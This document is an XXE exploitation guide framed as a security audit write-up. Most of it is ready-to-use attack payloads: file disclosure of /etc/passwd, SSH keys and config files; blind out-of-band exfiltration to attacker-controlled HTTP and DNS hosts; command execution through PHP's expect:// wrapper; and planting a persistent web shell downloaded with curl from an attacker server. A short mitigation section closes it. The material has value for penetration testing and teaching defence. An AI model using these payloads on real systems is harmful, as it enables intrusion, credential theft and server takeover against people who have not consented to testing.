Comprehensive Guide to XML External Entity (XXE) Exploitation: Advanced Data Exfiltration, Blind Methods, and Achieving Remote Code Execution

23 September 2025

1. Introduction to XXE Vulnerabilities and Their Implications

While conducting a thorough security evaluation of a web application, I identified a severe XML External Entity (XXE) vulnerability. This issue allowed for the unauthorized retrieval of sensitive information, including system-level files, API keys, database connection strings, and user authentication details. By employing blind XXE exploitation strategies alongside out-of-band (OOB) data exfiltration techniques, I was able to elevate the attack to remote code execution (RCE), taking advantage of insecure configurations in the XML parser.

This in-depth guide explores:

  • Techniques for identifying and confirming XML processing endpoints
  • Methods for disclosing local files with practical examples
  • Approaches to bypass input validation and character restrictions using advanced encoding
  • Detailed blind XXE exploitation via HTTP and DNS protocols
  • Steps to escalate to RCE through PHP wrappers and persistent shell deployment

XXE vulnerabilities arise when an XML parser resolves external entities without restriction. XML entities can reference external resources, such as files on the local filesystem or URLs on remote servers. If the parser is configured to resolve them (the default in many Java parsers such as DocumentBuilder, and in PHP when the LIBXML_NOENT flag is set or a libxml2 release older than 2.9.0 is in use), attackers can inject malicious entities to read files, perform server-side request forgery (SSRF), or in some configurations execute code. This is particularly dangerous in applications that handle user-submitted XML, such as APIs, file uploads, or configuration imports.
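
To make the entity mechanism concrete, here is a minimal Python sketch that uses a harmless internal entity, so no file or network access is involved. It assumes the standard-library xml.etree.ElementTree parser; the entity name greeting and the element names are made up for illustration. An external entity is declared with SYSTEM and a URI instead of a literal value, and that is the form a hardened parser should refuse to resolve.

```python
import xml.etree.ElementTree as ET

# A DTD internal subset that declares one internal entity.
# "greeting" is a hypothetical name chosen for this illustration.
DOCUMENT = """<?xml version="1.0"?>
<!DOCTYPE note [
  <!ENTITY greeting "hello from the DTD">
]>
<note><body>&greeting;</body></note>"""


def expand_body(xml_text: str) -> str:
    """Parse the document and return the text of <body> after entity expansion."""
    root = ET.fromstring(xml_text)
    return root.findtext("body")


if __name__ == "__main__":
    print(expand_body(DOCUMENT))
```

The parser substitutes the entity's value wherever &greeting; appears, which is the same substitution step an XXE payload abuses.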

Common root causes include:

  • DTD (Document Type Definition) processing left enabled.
  • External entity resolution not disabled in the parser.
  • Insufficient validation of user-supplied XML.

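The impact ranges from information disclosure (CWE-200) to full system compromise, depending on the environment. The underlying weakness itself is tracked as CWE-611 (Improper Restriction of XML External Entity Reference).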


2. Step-by-Step Exploitation Process

Step 1: Identifying Vulnerable XML Endpoints

Begin by mapping the application’s attack surface to find endpoints that accept and parse XML. Use tools like Burp Suite, ZAP, or Postman to intercept and analyze HTTP requests. Look for:

  • Content-Type headers set to application/xml or text/xml.
  • Endpoints handling SOAP, REST with XML payloads, or file uploads (e.g., SVG, DOCX which contain XML).
  • Form submissions or API calls with XML-structured bodies.

In this case, a POST request to /api/endpoint was captured:

POST /api/endpoint HTTP/1.1
Host: target.site
Content-Type: application/xml
Content-Length: 180

<?xml version="1.0" encoding="UTF-8"?>
<submission>
  <source>user@external.com</source>
  <target>admin@internal.com</target>
  <body>Standard submission content.</body>
</submission>

To automate discovery, use fuzzing tools like wfuzz or ffuf with XML payloads. Additionally, review source code if available (e.g., via leaked repositories) or check for known vulnerable libraries in the application’s stack.
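
As a rough aid when triaging captured traffic, the following Python sketch flags requests that are likely to reach an XML parser. It is a heuristic under stated assumptions: the function name looks_like_xml and the media-type set are illustrative, and a body without an XML prolog or DOCTYPE is not detected by the sniffing fallback.

```python
# Media types that usually indicate XML processing (illustrative, not exhaustive).
XML_MEDIA_TYPES = {"application/xml", "text/xml"}


def looks_like_xml(content_type: str, body: bytes) -> bool:
    """Return True if the header or the start of the body suggests XML."""
    media_type = content_type.split(";", 1)[0].strip().lower()
    # Covers application/xml, text/xml and structured types such as
    # application/soap+xml or image/svg+xml.
    if media_type in XML_MEDIA_TYPES or media_type.endswith("+xml"):
        return True
    # Fall back to sniffing: skip a UTF-8 BOM and leading whitespace.
    start = body.lstrip(b"\xef\xbb\xbf \t\r\n")
    return start.startswith((b"<?xml", b"<!DOCTYPE"))


if __name__ == "__main__":
    print(looks_like_xml("application/xml", b"<submission/>"))
```

Endpoints that advertise JSON but still accept an XML body are worth checking by hand, since this check only inspects what was actually sent.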

Step 2: Testing for Basic XXE Vulnerability

Inject a test payload to see if external entities are resolved. Target readable system files like /etc/passwd on Linux or C:\Windows\win.ini on Windows for proof-of-concept:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE submission [
  <!ENTITY test SYSTEM "file:///etc/passwd">
]>
<submission>
  <source>&test;</source>
  <target>admin@internal.com</target>
</submission>

If the entity is resolved, the response includes the file content:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
...

This output confirms the vulnerability: the parser is expanding the entity and including the file content in the response. Variations to note:

  • On Windows: Use file:///C:/Windows/win.ini for testing.
  • Error messages might reveal partial content if direct echo is suppressed.

If no response is echoed, proceed to blind techniques (Section 4).
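
When many responses have to be reviewed, reflected /etc/passwd content can be spotted by matching its seven colon-separated fields. The Python sketch below is a heuristic along those lines; the function name and the regular expression are illustrative and not taken from any particular tool.

```python
import re

# name:password:UID:GID:comment:home:shell, with the home directory
# starting with "/". The final field stops at "<" so that a closing
# XML tag is not swallowed.
PASSWD_ENTRY = re.compile(
    r"[A-Za-z_][A-Za-z0-9_.-]*:[^:\n]*:\d+:\d+:[^:\n]*:/[^:\n]*:[^:\n<]*"
)


def count_passwd_entries(response_body: str) -> int:
    """Count substrings of the response that look like passwd entries."""
    return len(PASSWD_ENTRY.findall(response_body))


if __name__ == "__main__":
    sample = "<source>root:x:0:0:root:/root:/bin/bash</source>"
    print(count_passwd_entries(sample))
```

A count of zero does not rule out XXE; it only means the content was not echoed, which is the blind case.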


3. Advanced Techniques for File Disclosure and Evasion

Step 3: Bypassing Restrictions with Encoding and Filters

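File contents that include characters such as < or & break the XML document when expanded, and some applications also filter special characters in responses. On PHP targets, counter this with stream wrappers like php://filter, which encode the file before it is inserted, so the output neither breaks the XML nor triggers such filters: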

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE submission [
  <!ENTITY test SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
]>
<submission>
  <source>&test;</source>
</submission>

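Response example (truncated; shown here one encoded line of the file per row for readability, whereas the filter actually returns a single continuous Base64 string):

cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaA==
ZGFlbW9uOng6MToxOmRhZW1vbjovdXNyL3NiaW46L3Vzci9zYmluL25vbG9naW4K
YmluOng6MjoyOmJpbjovYmluOi91c3Ivc2Jpbi9ub2xvZ2luCg==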

Decode using:

echo -n "cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaA==" | base64 -d
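
The same decoding step can be scripted. This is a minimal Python sketch, assuming the Base64 text has already been copied out of the response; the function name decode_filter_output is hypothetical. It strips whitespace first, since proxies and pretty-printers sometimes wrap long strings.

```python
import base64


def decode_filter_output(encoded: str) -> bytes:
    """Decode Base64 text produced by convert.base64-encode."""
    # Remove line breaks or spaces introduced while copying the response.
    compact = "".join(encoded.split())
    # validate=True rejects stray non-Base64 characters instead of ignoring them.
    return base64.b64decode(compact, validate=True)


if __name__ == "__main__":
    sample = "cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaA=="
    print(decode_filter_output(sample).decode())
```

Returning bytes rather than text keeps the helper usable for binary files as well.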

Other filters include:

  • convert.iconv.UTF8.CSISO2022KR for character set conversions.
  • zlib.deflate for compression, followed by decompression on your end.

This is crucial for binary files (e.g., images, executables) or when files contain XML-invalid characters.
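
For the compression case, the following Python sketch shows the decompression step on the analyst's side. It assumes the payload chained zlib.deflate with convert.base64-encode and that PHP's zlib.deflate emits a raw DEFLATE stream (RFC 1951) without a zlib header, which is why a negative wbits value is used; the function name is hypothetical.

```python
import base64
import zlib


def decode_deflated_output(encoded: str) -> bytes:
    """Base64-decode the response text, then inflate the raw DEFLATE stream."""
    compressed = base64.b64decode("".join(encoded.split()), validate=True)
    # Negative wbits tells zlib to expect raw DEFLATE data with no header
    # or checksum (assumption about the filter's output format).
    return zlib.decompress(compressed, wbits=-zlib.MAX_WBITS)


if __name__ == "__main__":
    # Build a sample in the assumed format, then decode it again.
    compressor = zlib.compressobj(wbits=-zlib.MAX_WBITS)
    raw = compressor.compress(b"example file content") + compressor.flush()
    print(decode_deflated_output(base64.b64encode(raw).decode()))
```

If decompression fails with a header error, the stream may carry a zlib or gzip wrapper instead, and the wbits value would need adjusting.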

Step 4: Extracting Sensitive Application Files

Escalate by targeting high-value files. Examples:

  • Database configs: /var/www/html/config/database.php
  • SSH keys: /root/.ssh/id_rsa
  • Environment vars: /proc/self/environ

Payload for a config file:

<!DOCTYPE submission [
  <!ENTITY config SYSTEM "php://filter/convert.base64-encode/resource=/var/www/html/config.php">
]>
<submission>
  <source>&config;</source>
</submission>

Decoded response might show:

<?php
$host = 'localhost';
$dbname = 'sensitive_db';
$user = 'db_user';
$pass = 'VerySecretPassword456!';
$api_key = 'sk_live_XXXXXXXXXXXXXXXXXXXX';
?>

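Recovered credentials enable further attacks, such as direct database access or API abuse. If the application's install path is unknown, try common locations, or relative traversal where the parser resolves relative paths (e.g., file:///../../../../etc/passwd).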


4. Blind XXE Exploitation and Out-of-Band (OOB) Exfiltration

Blind XXE occurs when entity expansion happens but results aren’t reflected. Use OOB to confirm and exfiltrate.

Step 5: HTTP OOB for Vulnerability Confirmation and Data Leakage

Force the server to request a resource from your controlled server:

<!DOCTYPE submission [
  <!ENTITY oob SYSTEM "http://your.burpcollaborator.net/xxe_test">
]>
<submission>
  <source>&oob;</source>
</submission>

Monitor with Burp Collaborator or a custom server:

nc -lvnp 80
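
Where a structured record of callbacks is preferable to raw netcat output, a small logging server is one option. This is a minimal Python sketch using the standard-library http.server module; the names CallbackLogger, SEEN_REQUESTS, and make_server, as well as the default port 8000, are assumptions for illustration.

```python
from http.server import BaseHTTPRequestHandler, HTTPServer

# Collected (client_ip, request_path) tuples, newest last.
SEEN_REQUESTS = []


class CallbackLogger(BaseHTTPRequestHandler):
    """Record every GET request and answer with an empty 200 response."""

    def do_GET(self):
        SEEN_REQUESTS.append((self.client_address[0], self.path))
        self.send_response(200)
        self.send_header("Content-Length", "0")
        self.end_headers()

    def log_message(self, format, *args):
        # Suppress the default stderr access log; SEEN_REQUESTS is the record.
        pass


def make_server(host: str = "127.0.0.1", port: int = 8000) -> HTTPServer:
    """Create the listener; call serve_forever() on the result to run it."""
    return HTTPServer((host, port), CallbackLogger)
```

Calling make_server("0.0.0.0", 80).serve_forever() would mirror the netcat command above; binding to port 80 normally requires elevated privileges.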

For data exfil, embed content in the URL:

<!DOCTYPE submission [
  <!ENTITY % file SYSTEM "file:///etc/passwd">
  <!ENTITY oob SYSTEM "http://yourserver.net/?data=%file;">
]>
<submission>
  <source>&oob;</source>
</submission>

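Note: Parameter entities (%) are needed for this kind of DTD trick, but parsers that follow the XML specification reject parameter-entity references inside markup declarations in the internal subset, and they do not expand %file; inside a SYSTEM literal. The inline form above is therefore a simplification; in practice the declarations are served from an externally hosted DTD that the payload references.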
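
On the receiving side, the leaked value has to be pulled back out of the logged request line. The Python sketch below does that for the data query parameter used in the payload above; the function name is hypothetical, and multi-line file content may not survive the trip, since many URL handlers reject or truncate line breaks.

```python
from urllib.parse import parse_qs, urlsplit


def extract_data_param(request_target: str) -> list[str]:
    """Return the percent-decoded values of the 'data' query parameter."""
    query = urlsplit(request_target).query
    # keep_blank_values=True makes an empty "data=" show up as "".
    return parse_qs(query, keep_blank_values=True).get("data", [])


if __name__ == "__main__":
    print(extract_data_param("/?data=web01"))
```

An empty list means the callback arrived without the parameter, which still confirms that the entity was resolved.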

Step 6: DNS OOB for Restricted Environments

Outbound DNS is often still permitted where outbound HTTP is filtered. Exfiltrate via subdomains:

<!DOCTYPE submission [
  <!ENTITY % file SYSTEM "file:///etc/passwd">
  <!ENTITY % eval "<!ENTITY oob SYSTEM 'http://%file;.yourdomain.com/'>">
  %eval;
]>
<submission>
  <source>&oob;</source>
</submission>

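Capture the lookups with tcpdump port 53 or a DNS server log. Because parsers reject parameter-entity references inside declarations in the internal subset, the declarations generally have to be served from an externally hosted DTD. Hostname rules also limit what fits: each label holds at most 63 characters drawn from letters, digits, and hyphens, so a multi-line file such as /etc/passwd cannot be embedded directly, and short single-line values (e.g., /etc/hostname) are the realistic target. For large files, split the data into chunks using CDATA or substring methods (requires custom DTD hosting for advanced cases).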
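
Whether a value can travel inside a hostname at all follows from the DNS naming rules: a label is 1 to 63 characters of letters, digits, and hyphens, cannot start or end with a hyphen, and the full name is limited to 253 characters. The Python sketch below checks a candidate value against those rules; the function name is hypothetical and yourdomain.com is the placeholder domain from the payload above.

```python
import re

# One DNS label: letters, digits, hyphens; no leading or trailing hyphen.
LABEL = re.compile(r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)")


def fits_in_hostname(value: str, suffix: str = "yourdomain.com") -> bool:
    """Return True if value is usable as a single label in front of suffix."""
    if LABEL.fullmatch(value) is None:
        return False
    return len(f"{value}.{suffix}") <= 253


if __name__ == "__main__":
    print(fits_in_hostname("web01"))
    print(fits_in_hostname("root:x:0:0:root:/root:/bin/bash"))
```

The second call illustrates why a raw /etc/passwd line fails: colons and slashes are not valid label characters.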


5. Achieving Remote Code Execution (RCE)

Step 7: Using expect:// Wrapper for Command Execution

If PHP’s expect extension is installed (check via phpinfo() if accessible), execute commands:

<!DOCTYPE submission [
  <!ENTITY rce SYSTEM "expect://ls -la /">
]>
<submission>
  <source>&rce;</source>
</submission>

The response could list the root directory. Escalate with id, uname -a, or cat /etc/shadow (the last only succeeds if the web server process runs as root).

Step 8: Deploying a Persistent Web Shell

Host a shell:

<?php system($_GET['cmd']); ?>

Save it as shell.php and serve it via python3 -m http.server.

Inject:

<!DOCTYPE submission [
  <!ENTITY deploy SYSTEM "expect://curl http://yourserver/shell.php -o /var/www/html/shell.php">
]>
<submission>
  <source>&deploy;</source>
</submission>

Execute via http://target.site/shell.php?cmd=uname%20-a (spaces in the command must be URL-encoded). wget or fetch can serve as alternatives to curl. For non-writable directories, use /tmp and a symlink if possible.


6. Mitigation Strategies in Detail

Recommended mitigations by vulnerability type:

  • Basic and Blind XXE: Disable DTD processing and external entity resolution in the parser. In PHP, avoid the LIBXML_NOENT and LIBXML_DTDLOAD flags; libxml_disable_entity_loader(true) is only relevant before PHP 8.0, where the function was deprecated. Where XML is not required, prefer a simpler data format such as JSON.
  • File Disclosure: Validate inputs against allowlists; sandbox the application; restrict file system permissions.
  • RCE via Wrappers: Remove unneeded PHP extensions such as expect and restrict stream wrappers; run the web server user with least privilege.
  • OOB Exfiltration: Restrict outbound traffic at the firewall; monitor DNS/HTTP logs; use WAF rules for anomalous requests.
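
One strict way to apply the advice on disabling entity resolution is to refuse any document that carries a DOCTYPE at all. The sketch below illustrates this in Python rather than PHP, using only the standard library; the names DoctypeForbidden and parse_untrusted are hypothetical, and the approach assumes the application never needs DTDs in user-supplied XML.

```python
import xml.etree.ElementTree as ET
import xml.parsers.expat


class DoctypeForbidden(ValueError):
    """Raised when untrusted XML contains a DOCTYPE declaration."""


def parse_untrusted(xml_bytes: bytes) -> ET.Element:
    """Parse XML only if it carries no DTD; raise DoctypeForbidden otherwise."""
    checker = xml.parsers.expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        # Fires as soon as the parser reaches "<!DOCTYPE", before any
        # entity declared in the DTD could be referenced.
        raise DoctypeForbidden(f"DOCTYPE {name!r} is not allowed")

    checker.StartDoctypeDeclHandler = on_doctype
    checker.Parse(xml_bytes, True)  # raises ExpatError on malformed input
    return ET.fromstring(xml_bytes)


if __name__ == "__main__":
    doc = b"<submission><source>user@external.com</source></submission>"
    print(parse_untrusted(doc).findtext("source"))
```

The document is parsed twice, which keeps the sketch short at the cost of some efficiency; rejecting the DOCTYPE outright blocks both the reflected and the blind payload styles, since each depends on a DTD.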

Additional best practices: Regular patching, code reviews, and penetration testing.


7. Conclusion and Key Takeaways

This audit demonstrated how a simple XXE flaw can lead to catastrophic breaches. The methodical escalation from file disclosure to RCE underlines the need for robust XML handling practices and proactive security measures. Always test in controlled environments and report responsibly.